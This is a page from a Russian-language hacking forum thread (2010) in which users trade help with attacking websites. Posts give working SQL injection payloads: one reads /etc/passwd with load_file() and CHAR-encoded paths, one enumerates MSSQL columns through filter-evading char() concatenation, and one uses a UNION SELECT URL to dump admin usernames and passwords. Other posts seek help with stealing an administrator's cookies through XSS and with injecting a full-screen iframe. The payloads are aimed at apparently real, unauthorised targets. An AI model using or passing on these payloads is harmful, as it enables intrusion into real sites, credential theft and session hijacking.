Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.05.2010, 19:23
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от Konqi
Попробуй
load_file(CHAR(47,101,116,99,47,112,97,115,115,119 ,100))
Из прошлого запроса видно что ковычка не фильтруется.
|
|
|
06.05.2010, 19:30
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= char(116)+char(98)+char(108)+char(95)+char(103)+ch ar(114)+char(111)+char(117)+char(112)+char(95)+cha r(97)+char(100)+char(109)+char(105)+char(110))-- syntaxe incorrecte vers 'char'.
на encode не пробовал
заменив "+" на "%2B"
скорее всего причина в этом
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
|
|
|
|
06.05.2010, 19:36
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
2 pinch
nea,тот же результат =(
|
|
|
|
06.05.2010, 19:39
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
интересно может ссылку дашь....
|
|
|
|
06.05.2010, 20:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pinch
интересно может ссылку дашь....
в личку
|
|
|
|
06.05.2010, 20:03
|
|
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459
Репутация:
116
|
|
А мне кто поможет?
Есть активная xss. Как через яваскрипт сделать размер ифрейма на весь экран?
p.s. С помощью этого <iframe src=//сайт>
|
|
|
|
06.05.2010, 20:05
|
|
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738
Репутация:
2
|
|
Сообщение от Hero1n
мдаааа, ты уже топик вроде создавал, и тебе там совершенно ясно ответили, зачем здесь пишешь?!
http://en.wikipedia.org/wiki/Basic_access_authentication
alert() тут не причём, это не javascript.
Создавать то создавал, но потом в описании раздела увидел, что нельзя, через день удалили тред.
Кинули ссылку на ман по тому как сделать, а я пока скорее нахожусь на уровне скрипт - кидди)
Из википедии понял только что шифрование на Base64, никаких уязвимостей там не написано.
ЗЫ: мой вопрос на странице 1293
Последний раз редактировалось ReckouNT; 06.05.2010 в 20:10..
|
|
|
|
06.05.2010, 20:24
|
|
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737
Репутация:
-5
|
|
Подскажите как вытащить cookies с сайта, есть XSS уязвимость, задача вытащить cookies админа, испробавала пока на себе (document.cookie(JS)) нормально вытаскивает и записывает но одна проблема всего 4 значения а их там 6... т.е не все полностью тащит, есть еще какие то варианты?
|
|
|
|
06.05.2010, 23:10
|
|
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737
Репутация:
-5
|
|
Оказывается надо было просто аворитизироваться, и появится все параметры, вопрос закрыт
|
|
|
|
07.05.2010, 02:09
|
|
Новичок
Регистрация: 27.03.2009
Сообщений: 11
Провел на форуме:
39049
Репутация:
1
|
|
Исправьте запрос, никак не могу вывести таблицу
http://blocked/browse_classifieds.php?s=classified_date%20DESC&v= 0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admi n_password),2,3+from+se_admins
Последний раз редактировалось Rabben; 07.05.2010 в 03:16..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
